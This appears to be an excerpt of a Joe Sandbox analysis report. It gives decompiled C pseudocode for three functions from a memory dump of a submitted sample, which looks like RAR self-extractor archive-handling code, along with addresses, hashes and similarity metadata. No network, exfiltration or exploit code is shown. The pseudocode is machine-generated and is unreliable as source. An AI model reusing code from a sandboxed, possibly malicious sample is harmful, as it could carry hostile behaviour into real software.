							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E010015A0(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E01003AAC(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E01006DC1(__eflags, 0x1b, _t172 + 0x24);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E0100FE56(_t172 + 0x6cfa, _t172 + 0x24, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0x1033260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E01003AAC(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0x1033260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E01001EDA(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E01001EDA(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E01003AAC(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0x1033260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E01006DC1(__eflags, 0x3c, _t172 + 0x24);
								goto L1;
							}
							E010015A0(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E01001DA8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0x1033260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0x1033260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0x1033260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0x1033260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}

0x010019a6
0x010019a6
0x010019ab
0x010019b4
0x010019bc
0x010019c3
0x010019ca
0x010019d6
0x010019e3
0x010019ee
0x010019f1
0x010019f7
0x010019fc
0x010019fe
0x01001a44
0x01001a4b
0x01001a53
0x01001a5b
0x01001a69
0x01001a6f
0x01001a77
0x01001a7a
0x01001a7c
0x01001a7e
0x01001a81
0x01001a83
0x01001b26
0x01001b26
0x01001b2d
0x01001b30
0x01001b3c
0x01001b3c
0x01001b3c
0x01001b40
0x01001b45
0x01001b45
0x01001b4b
0x01001b4e
0x01001b60
0x01001b63
0x01001b9d
0x01001ba7
0x01001bab
0x01001bb3
0x01001bb8
0x01001bbb
0x01001bbd
0x01001bff
0x01001bff
0x01001c02
0x01001c02
0x01001c08
0x01001c0a
0x01001c16
0x01001c16
0x01001c1d
0x01001c23
0x01001c23
0x01001c25
0x01001c2d
0x01001c2d
0x01001c32
0x01001c36
0x00000000
0x01001c3c
0x01001c3c
0x01001c3c
0x01001c46
0x01001c4c
0x01001d5e
0x01001d5e
0x01001d65
0x01001d70
0x01001d80
0x01001d85
0x01001d85
0x01001d87
0x01001d8d
0x01001d97
0x01001d97
0x01001d67
0x01001d6e
0x00000000
0x00000000
0x00000000
0x01001d6e
0x01001c52
0x01001c59
0x01001c68
0x01001c6f
0x01001c79
0x01001c7b
0x01001c83
0x01001c8c
0x01001c95
0x01001c9e
0x01001ca7
0x01001cf0
0x01001cf2
0x01001cf7
0x01001cf9
0x00000000
0x00000000
0x01001cb3
0x01001cb9
0x01001cbc
0x01001cdf
0x01001ce2
0x01001cfd
0x01001d04
0x01001d14
0x01001d14
0x01001d14
0x01001d16
0x01001d16
0x01001d1c
0x01001d1f
0x01001d28
0x01001d31
0x01001d3a
0x01001d43
0x01001d54
0x01001d5c
0x00000000
0x01001d5c
0x01001d06
0x01001d0d
0x00000000
0x00000000
0x01001d11
0x00000000
0x01001d11
0x01001ce4
0x01001ce7
0x00000000
0x00000000
0x01001ce9
0x01001ceb
0x00000000
0x01001ceb
0x01001cbe
0x01001cc5
0x01001cd5
0x01001cd5
0x01001cd5
0x01001cd7
0x01001cd7
0x00000000
0x01001cd7
0x01001cc7
0x01001cce
0x00000000
0x00000000
0x01001cd2
0x00000000
0x01001cd2
0x00000000
0x01001cfb
0x01001c5b
0x01001c62
0x00000000
0x00000000
0x00000000
0x01001c62
0x01001c36
0x01001c1f
0x01001c21
0x00000000
0x00000000
0x00000000
0x01001c21
0x01001c0c
0x01001c10
0x00000000
0x00000000
0x00000000
0x01001c10
0x01001bbf
0x01001bc1
0x01001bc4
0x01001bc6
0x01001bcb
0x01001bd1
0x01001bd4
0x00000000
0x00000000
0x01001bda
0x01001be1
0x01001bec
0x01001bee
0x01001bf3
0x01001bf5
0x01001bf8
0x01001bfb
0x01001bfd
0x00000000
0x00000000
0x00000000
0x01001bfd
0x01001be3
0x01001be6
0x00000000
0x00000000
0x00000000
0x01001be6
0x01001cac
0x00000000
0x01001cac
0x01001b67
0x01001b70
0x01001b75
0x01001b7d
0x01001b7f
0x01001b82
0x00000000
0x00000000
0x01001b88
0x01001b8b
0x00000000
0x00000000
0x01001b91
0x00000000
0x01001b91
0x01001b56
0x00000000
0x01001b56
0x01001b32
0x00000000
0x00000000
0x00000000
0x00000000
0x01001a89
0x01001a89
0x01001a8c
0x01001a8e
0x01001a91
0x00000000
0x00000000
0x01001a97
0x01001a9c
0x01001a9e
0x01001ada
0x01001ada
0x00000000
0x01001ada
0x01001aa0
0x01001aa3
0x01001aa9
0x01001aac
0x01001ae4
0x01001ae6
0x01001aec
0x01001af2
0x01001af8
0x01001b00
0x01001b02
0x01001b08
0x01001b0b
0x01001b12
0x01001b17
0x01001b1c
0x01001b24
0x00000000
0x01001b24
0x01001b0d
0x01001b10
0x00000000
0x00000000
0x00000000
0x01001b10
0x01001aae
0x01001ab0
0x00000000
0x00000000
0x01001ab2
0x01001ab5
0x00000000
0x00000000
0x01001ab7
0x01001abb
0x00000000
0x00000000
0x01001ac0
0x01001ac2
0x01001ac6
0x00000000
0x00000000
0x01001ac8
0x01001acc
0x00000000
0x00000000
0x01001ace
0x01001ad2
0x00000000
0x00000000
0x01001ad4
0x01001ad8
0x00000000
0x00000000
0x00000000
0x01001add
0x01001add
0x01001ade
0x01001ade
0x00000000
0x01001ae2
0x01001a00
0x01001a06
0x01001a09
0x01001a0f
0x01001a12
0x01001a17
0x01001a1f
0x01001a27
0x01001a2c
0x01001a34
0x01001a34
0x00000000
0x01001a09
0x010019e5
0x010019e5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 010019AB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69a1c9b74a68f495d355f1fe357a9a1dff114db6ab66c261fab7141ee04348a8
Instruction ID: f35014a7f7c0ab66f65bf890c53867262476c64472ce58e1d7094b0e34cfa4ae
Opcode Fuzzy Hash: 69a1c9b74a68f495d355f1fe357a9a1dff114db6ab66c261fab7141ee04348a8
Instruction Fuzzy Hash: 5CC17C30A042489FFF56DF68C484BA97BE5AF0A314F0840BADD869B2C6CB75D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01003B3D, Relevance: 1.7, APIs: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01003B3D(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E0101E28C(E01031D16, _t153);
				E0101E360();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E01006DC1(__eflags, 0x1e, _t151 + 0x24);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E0100C926(_t83, _t120);
						_push(_t120);
						E0101187A(_t153 - 0xe6ec, __eflags);
						_t121 = 0;
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E01012C42(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E0100AA88(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E0100C9D9(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E010128F1(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E010092E6(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
								__eflags = E0100AA56(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
								if(__eflags != 0) {
									_t121 = 1;
								} else {
									E01001F94(__eflags, 0x1f, _t151 + 0x24, _t151 + 0x45f8);
									E01006FC6(0x1040f50, 3);
									__eflags = _t148;
									if(_t148 != 0) {
										E01003E53(_t148);
									}
								}
								L25:
								E01011ACF(_t153 - 0xe6ec, _t143, _t148, _t151);
								_t76 = _t121;
								goto L28;
							}
							_t143 =  *(_t151 + 0x21bc);
							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
							E0100C991(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
							goto L18;
						}
						__eflags =  *(_t151 + 0x5634);
						if(__eflags < 0) {
							L12:
							__eflags = _t148;
							if(_t148 != 0) {
								E01002034(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
								E0100C9F6(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
							} else {
								 *((char*)(_t151 + 0x2111)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E01006DC1(__eflags, 0x1e, _t151 + 0x24);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
						goto L7;
					} else {
						_t76 = 1;
						goto L28;
					}
				} else {
					E01006DC1(_t156, 0x1d, _t151 + 0x24);
					E01006FC6(0x1040f50, 3);
					L27:
					_t76 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
					return _t76;
				}
			}

0x01003b3d
0x01003b3d
0x01003b42
0x01003b4c
0x01003b52
0x01003b54
0x01003b5b
0x01003b79
0x01003b80
0x01003dc2
0x01003dc8
0x00000000
0x01003dc8
0x01003b88
0x01003b99
0x01003b9f
0x00000000
0x00000000
0x01003bab
0x01003bab
0x01003bb1
0x01003bc2
0x01003bc3
0x01003bcc
0x01003bd1
0x01003bd8
0x01003bdd
0x01003bec
0x01003bef
0x01003bf4
0x01003bf7
0x01003bfa
0x01003c4f
0x01003c4f
0x01003c55
0x01003cb1
0x01003cbf
0x01003cd3
0x01003ce0
0x01003ce6
0x01003cec
0x01003cf4
0x01003cfa
0x01003d06
0x01003d12
0x01003d15
0x01003d18
0x01003d1e
0x01003d24
0x01003d2a
0x01003d30
0x01003d36
0x01003d3c
0x01003d55
0x01003d3e
0x01003d3e
0x01003d3f
0x01003d40
0x01003d41
0x01003d41
0x01003d6f
0x01003d71
0x01003d80
0x01003d82
0x01003daf
0x01003d84
0x01003d91
0x01003d9d
0x01003da2
0x01003da4
0x01003da8
0x01003da8
0x01003da4
0x01003db1
0x01003db7
0x01003dbd
0x00000000
0x01003dbf
0x01003c57
0x01003c5d
0x01003c63
0x00000000
0x00000000
0x01003c8c
0x01003c95
0x01003c95
0x01003cac
0x00000000
0x01003cac
0x01003bfc
0x01003c02
0x01003c22
0x01003c22
0x01003c24
0x01003c37
0x01003c4a
0x01003c26
0x01003c26
0x01003c26
0x00000000
0x01003c24
0x01003c04
0x01003c12
0x01003c18
0x00000000
0x01003c18
0x01003c06
0x01003c10
0x00000000
0x00000000
0x00000000
0x01003c10
0x01003bb3
0x01003bb9
0x00000000
0x01003bbb
0x01003bbb
0x00000000
0x01003bbb
0x01003b5d
0x01003b63
0x01003b6f
0x01003dcd
0x01003dcd
0x01003dcf
0x01003dd3
0x01003ddd
0x01003ddd

APIs

__EH_prolog.LIBCMT ref: 01003B42

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 10e34c2be9d637250aadaa4cc7289d87664479eff413ac0d1e1dfe6fa9581733
Instruction ID: c943a655b371ffcfdc381903c939789aaf6ad78746aec7353559e8d98c5351ae
Opcode Fuzzy Hash: 10e34c2be9d637250aadaa4cc7289d87664479eff413ac0d1e1dfe6fa9581733
Instruction Fuzzy Hash: 7E71A071504F459EEB27EB74CC50AEBB7E9BB24201F44496EE6DB8B181DA326548CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0100837F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0100837F(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				void* _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0101E28C(E01031E2A, _t95);
				E0101E360();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E01001380(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E01009EF7(_t6, __edi, _t93, _t93 + 0xf6) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E010019A6(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d34; // -38196
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0100FE56(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0100BAC4(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E010070BF(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E0100A4C6(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E01008517(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82fa) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x6201)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82fa)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82fa)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x6201));
								_t32 =  *((char*)(_t51 + 0x6201)) == 0;
								__eflags =  *((char*)(_t51 + 0x6201)) == 0;
								E01011359((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf6);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E01001F00(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E01003AAC(_t34, _t89, _t93);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E0100857B(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E01006FC6(0x1040f50, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E01001631(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x0100837f
0x0100837f
0x0100837f
0x0100837f
0x01008384
0x0100838e
0x01008394
0x01008396
0x0100839f
0x010083a4
0x010083af
0x010083bc
0x010083c4
0x010083ca
0x010083d1
0x010083e4
0x010083eb
0x010083f2
0x010083f5
0x010083f7
0x010083fd
0x01008404
0x0100840b
0x01008412
0x01008417
0x01008432
0x0100843e
0x01008445
0x0100844a
0x01008450
0x01008455
0x01008457
0x0100845e
0x01008465
0x0100846a
0x0100846c
0x00000000
0x00000000
0x0100841f
0x01008425
0x0100842b
0x0100842b
0x0100846e
0x01008474
0x01008474
0x0100847a
0x01008483
0x01008488
0x0100848d
0x0100848e
0x0100848f
0x01008497
0x0100849a
0x010084a1
0x010084a1
0x0100849c
0x0100849c
0x0100849f
0x00000000
0x00000000
0x0100849f
0x010084a8
0x010084ab
0x010084b2
0x010084b4
0x010084c2
0x010084c2
0x010084c9
0x010084c9
0x010084ce
0x010084d4
0x010084d9
0x010084d9
0x010084df
0x010084e4
0x010084e9
0x010084f2
0x010084f7
0x010084f7
0x010084d9
0x010083d3
0x010083da
0x010083da
0x010083d1
0x010084fb
0x01008501
0x0100850c
0x01008516

APIs

__EH_prolog.LIBCMT ref: 01008384

Part of subcall function 01001380: __EH_prolog.LIBCMT ref: 01001385
Part of subcall function 01001380: new.LIBCMT ref: 010013FE

Part of subcall function 010019A6: __EH_prolog.LIBCMT ref: 010019AB

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

